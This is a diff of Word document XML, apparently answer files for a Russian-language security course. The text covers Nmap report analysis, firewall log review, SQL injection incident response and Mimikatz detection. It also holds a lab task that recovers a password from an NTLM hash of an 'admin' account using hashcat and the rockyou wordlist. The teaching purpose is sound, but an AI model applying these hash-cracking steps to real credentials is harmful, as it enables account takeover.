+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> также позволяет использовать NSE (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Scripting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Engine) для выполнения дополнительных проверок и тестов на уязвимости. Скрипты могут помочь в выявлении специфических проблем безопасности, таких как открытые базы данных или уязвимости к SQL-инъекциям</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6089,7 +7755,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    Открытые порты: Если отчет показывает множество открытых портов, это может свидетельствовать о потенциальных точках входа для злоумышленников.</w:t>
+        <w:t xml:space="preserve">    Открытые порты</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: Если</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> отчет показывает множество открытых портов, это может свидетельствовать о потенциальных точках входа для злоумышленников.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6123,7 +7797,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Таким образом, анализируя отчет Nmap, важно обращать внимание на состояние портов, версии служб и используемые методы сканирования для выявления возможных проблем безопасности в сети.</w:t>
+        <w:t xml:space="preserve">Таким образом, анализируя отчет </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, важно обращать внимание на состояние портов, версии служб и используемые методы сканирования для выявления возможных проблем безопасности в сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6140,15 +7822,28 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Восстановите пароль из хеша</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>fmarket.stf\admin:1337:aad3b435b51404eeaad3b435b51404ee:bebaecb23aa18f5375628541ff3fb3b8:::</w:t>
+        <w:t xml:space="preserve">Восстановите пароль из </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>хеша</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>fmarket.stf\admin:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>1337:aad</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>3b435b51404eeaad3b435b51404ee:bebaecb23aa18f5375628541ff3fb3b8:::</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6448,12 +8143,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>hashcat</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -6542,14 +8239,15 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03928165" wp14:editId="62F350B3">
-            <wp:extent cx="3185870" cy="2796540"/>
-            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
-            <wp:docPr id="1995492606" name="Рисунок 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="232D8B55" wp14:editId="275DE501">
+            <wp:extent cx="2482479" cy="2178755"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1929968354" name="Рисунок 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6557,23 +8255,36 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1995492606" name=""/>
-                    <pic:cNvPicPr/>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId7" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm flipH="1">
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3194134" cy="2803794"/>
+                      <a:ext cx="2511678" cy="2204382"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -6587,7 +8298,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="052BE102" wp14:editId="3A6DBCE4">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="052BE102" wp14:editId="62D3BD50">
             <wp:extent cx="2980330" cy="1676400"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="485660699" name="Рисунок 1"/>
@@ -6652,12 +8363,14 @@
         <w:tab/>
         <w:t xml:space="preserve">Файл </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rockyou</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -6685,14 +8398,21 @@
       <w:r>
         <w:t xml:space="preserve">из </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Github</w:t>
       </w:r>
-    </w:p>
-    <w:p>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:tab/>
       </w:r>
@@ -6703,12 +8423,29 @@
         <w:t>a</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">6_123  </w:t>
-      </w:r>
-      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>6_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">123  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:tab/>
       </w:r>
-      <w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
@@ -6718,6 +8455,9 @@
         <w:t>https</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>://</w:t>
       </w:r>
       <w:r>
@@ -6727,6 +8467,9 @@
         <w:t>hashes</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
       <w:r>
@@ -6736,6 +8479,9 @@
         <w:t>com</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>/</w:t>
       </w:r>
       <w:r>
@@ -6745,6 +8491,9 @@
         <w:t>en</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>/</w:t>
       </w:r>
       <w:r>
@@ -6754,6 +8503,9 @@
         <w:t>decrypt</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>/</w:t>
       </w:r>
       <w:r>
@@ -6763,10 +8515,19 @@
         <w:t>hash</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>)</w:t>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="708" w:footer="708" w:gutter="0"/>

--- a/1/answer.docx
+++ b/1/answer.docx
@@ -24,15 +24,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Для эффективного использования журнала безопасности от межсетевого экрана (Firewall) между DMZ (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Demilitarized</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Zone) и Интернетом для обнаружения угроз, необходимо следовать нескольким ключевым шагам:</w:t>
+        <w:t>Для эффективного использования журнала безопасности от межсетевого экрана (Firewall) между DMZ (Demilitarized Zone) и Интернетом для обнаружения угроз, необходимо следовать нескольким ключевым шагам:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -50,51 +42,101 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">Необычные паттерны </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>Необычные паттерны трафика</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">(аномалии в объеме трафика, например, резкие всплески или падения) </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">и </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>трафика</w:t>
+        <w:t>Необычные IP-адреса</w:t>
       </w:r>
       <w:r>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">аномалии в объеме трафика, например, резкие всплески или падения) </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">и </w:t>
+      <w:r>
+        <w:t>которые не должны взаимодействовать с вашей сетью, и изучите их активность</w:t>
+      </w:r>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Мониторинг событий безопасности</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Необычные IP-адреса</w:t>
+        <w:t>Ошибки и предупреждения</w:t>
       </w:r>
       <w:r>
         <w:t>(</w:t>
       </w:r>
       <w:r>
-        <w:t>которые не должны взаимодействовать с вашей сетью, и изучите их активность</w:t>
-      </w:r>
-      <w:r>
-        <w:t>).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Мониторинг событий безопасности</w:t>
+        <w:t>ошибк</w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, предупреждения о подозрительных попытках доступа или блокировк</w:t>
+      </w:r>
+      <w:r>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> трафика</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Проверка на наличие атак(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>признаки попыток осуществления DDoS-атак, сканирования портов или попыток эксплуатации уязвимостей</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Сравнение с известными угрозами</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -107,175 +149,82 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ошибки и </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>Идентификация известных вредоносных IP</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Срав</w:t>
+      </w:r>
+      <w:r>
+        <w:t>нение</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> лог</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ов</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> с черными списками IP-адресов, известных как источники угроз</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) и </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>предупреждения</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Использование систем IDS/IPS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Интеграция с системами обнаружения и предотвращения вторжений для автоматического анализа и оповещения о подозрительных действиях</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Анализ поведения пользователей</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Аномалии в доступе</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>ошибк</w:t>
-      </w:r>
-      <w:r>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, предупреждения о подозрительных попытках доступа или блокировк</w:t>
-      </w:r>
-      <w:r>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> трафика</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">) и </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Проверка на наличие атак(</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">признаки попыток осуществления </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DDoS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-атак, сканирования портов или попыток эксплуатации уязвимостей</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Сравнение с известными угрозами</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Идентификация известных вредоносных </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>IP</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Срав</w:t>
-      </w:r>
-      <w:r>
-        <w:t>нение</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> лог</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ов</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> с черными списками IP-адресов, известных как источники угроз</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">) и </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Использование систем IDS/IPS</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:t>Интеграция с системами обнаружения и предотвращения вторжений для автоматического анализа и оповещения о подозрительных действиях</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Анализ поведения пользователей</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Аномалии в </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>доступе</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>Обратите внимание на изменения в поведении пользователей, такие как доступ к ресурсам, которые обычно не запрашиваются</w:t>
       </w:r>
@@ -499,13 +448,8 @@
         </w:rPr>
         <w:t>Изучить оповещение</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Определить</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, какие именно правила IDS сработали и какие параметры вызвали тревогу.</w:t>
+      <w:r>
+        <w:t>: Определить, какие именно правила IDS сработали и какие параметры вызвали тревогу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -521,13 +465,8 @@
         </w:rPr>
         <w:t>Логи системы</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Извлечь</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> логи веб-сервера и базы данных за период, связанный с инцидентом. Это может включать доступ к страницам, ошибки, запросы к базе данных и т.д.</w:t>
+      <w:r>
+        <w:t>: Извлечь логи веб-сервера и базы данных за период, связанный с инцидентом. Это может включать доступ к страницам, ошибки, запросы к базе данных и т.д.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -567,13 +506,8 @@
         </w:rPr>
         <w:t>Идентификация подозрительных запросов</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Найти</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> записи, содержащие подозрительные SQL-запросы или аномалии, такие как нестандартные параметры.</w:t>
+      <w:r>
+        <w:t>: Найти записи, содержащие подозрительные SQL-запросы или аномалии, такие как нестандартные параметры.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -589,13 +523,8 @@
         </w:rPr>
         <w:t>Проверка IP-адресов</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Просмотреть</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, откуда исходит трафик. Проверить, не является ли это известным вредоносным IP.</w:t>
+      <w:r>
+        <w:t>: Просмотреть, откуда исходит трафик. Проверить, не является ли это известным вредоносным IP.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -635,13 +564,8 @@
         </w:rPr>
         <w:t>Анализ кода приложения</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Определить</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, где в коде может происходить выполнение SQL-запросов. Ищите места, где не используются параметры для запросов или не проводится экранирование входных данных.</w:t>
+      <w:r>
+        <w:t>: Определить, где в коде может происходить выполнение SQL-запросов. Ищите места, где не используются параметры для запросов или не проводится экранирование входных данных.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -658,21 +582,8 @@
         </w:rPr>
         <w:t>Тестирование уязвимости</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Использовать</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> инструменты для тестирования на уязвимости (например, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SQLMap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) в контролируемой среде, чтобы воспроизвести инъекцию и понять масштаб проблемы.</w:t>
+      <w:r>
+        <w:t>: Использовать инструменты для тестирования на уязвимости (например, SQLMap) в контролируемой среде, чтобы воспроизвести инъекцию и понять масштаб проблемы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -712,13 +623,8 @@
         </w:rPr>
         <w:t>Проверка базы данных</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Изучить</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, были ли выполнены вредоносные запросы, например, извлечение, изменение или удаление данных.</w:t>
+      <w:r>
+        <w:t>: Изучить, были ли выполнены вредоносные запросы, например, извлечение, изменение или удаление данных.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -734,13 +640,8 @@
         </w:rPr>
         <w:t>Мониторинг системы</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Убедиться</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, что нет дальнейших атак или признаков компрометации.</w:t>
+      <w:r>
+        <w:t>: Убедиться, что нет дальнейших атак или признаков компрометации.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -780,29 +681,8 @@
         </w:rPr>
         <w:t>Исправление уязвимостей</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Внедрить</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> параметры для всех SQL-запросов, использовать ORM (Object-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Relational</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Mapping</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>), если это возможно.</w:t>
+      <w:r>
+        <w:t>: Внедрить параметры для всех SQL-запросов, использовать ORM (Object-Relational Mapping), если это возможно.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -818,13 +698,8 @@
         </w:rPr>
         <w:t>Обновление программного обеспечения</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Убедиться</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, что все компоненты системы обновлены до последних версий.</w:t>
+      <w:r>
+        <w:t>: Убедиться, что все компоненты системы обновлены до последних версий.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -840,13 +715,8 @@
         </w:rPr>
         <w:t>Настройка IDS/IPS</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Убедиться</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, что системы обнаружения и предотвращения вторжений настроены должным образом для выявления подобных атак в будущем.</w:t>
+      <w:r>
+        <w:t>: Убедиться, что системы обнаружения и предотвращения вторжений настроены должным образом для выявления подобных атак в будущем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -890,13 +760,8 @@
         </w:rPr>
         <w:t>Составление отчета</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Подготовить</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> отчет об инциденте, включив в него все шаги расследования, выявленные уязвимости и меры, принятые для устранения проблемы.</w:t>
+      <w:r>
+        <w:t>: Подготовить отчет об инциденте, включив в него все шаги расследования, выявленные уязвимости и меры, принятые для устранения проблемы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -912,13 +777,8 @@
         </w:rPr>
         <w:t>Обучение команды</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Провести</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> анализ инцидента с командой для повышения осведомленности и подготовки к предотвращению подобных атак в будущем.</w:t>
+      <w:r>
+        <w:t>: Провести анализ инцидента с командой для повышения осведомленности и подготовки к предотвращению подобных атак в будущем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1089,23 +949,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Использование IDS/IPS для обнаружения известных сигнатур инструментов дампа хэша, таких как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Mimikatz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Использование IDS/IPS для обнаружения известных сигнатур инструментов дампа хэша, таких как Mimikatz.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1195,39 +1039,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Поиск файлов, связанных с инструментами дампа хэша, в системе (например, </w:t>
-      </w:r>
